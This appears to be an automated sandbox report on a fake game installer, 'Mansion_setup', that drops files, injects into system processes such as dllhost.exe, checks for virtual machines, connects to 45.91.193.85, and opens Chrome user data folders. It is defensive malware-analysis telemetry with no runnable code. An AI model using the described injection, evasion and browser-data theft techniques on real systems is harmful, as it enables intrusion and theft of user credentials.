Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 526B83A
Source: C:\games\DDR5_NetCache\qtZint.exeMemory allocated: 42D0000 memory reserve | memory write watchJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeMemory allocated: 4630000 memory reserve | memory write watchJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeMemory allocated: 42D0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\System.dllJump to dropped file
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe TID: 6124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\Code Cache\wasm FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\blob_storage\a75057d9-634d-4613-b5d7-fb751fad2cd3 FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\Cache\Cache_Data FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user\Desktop\Mansion_setup (1).exeJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\app-64.7zJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess token adjusted: DebugJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess token adjusted: DebugJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.91.193.85 1308
Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 168A8A30000 protect: page read and write
Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory written: C:\Windows\System32\dllhost.exe base: 168A8A30000
Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exeJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --app-path="c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --app-path="c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1Jump to behavior
Source: explorer.exe, 0000000D.00000000.1547282409.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmlaunch.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmlaunch.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
Source: C:\games\DDR5_NetCache\qtZint.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
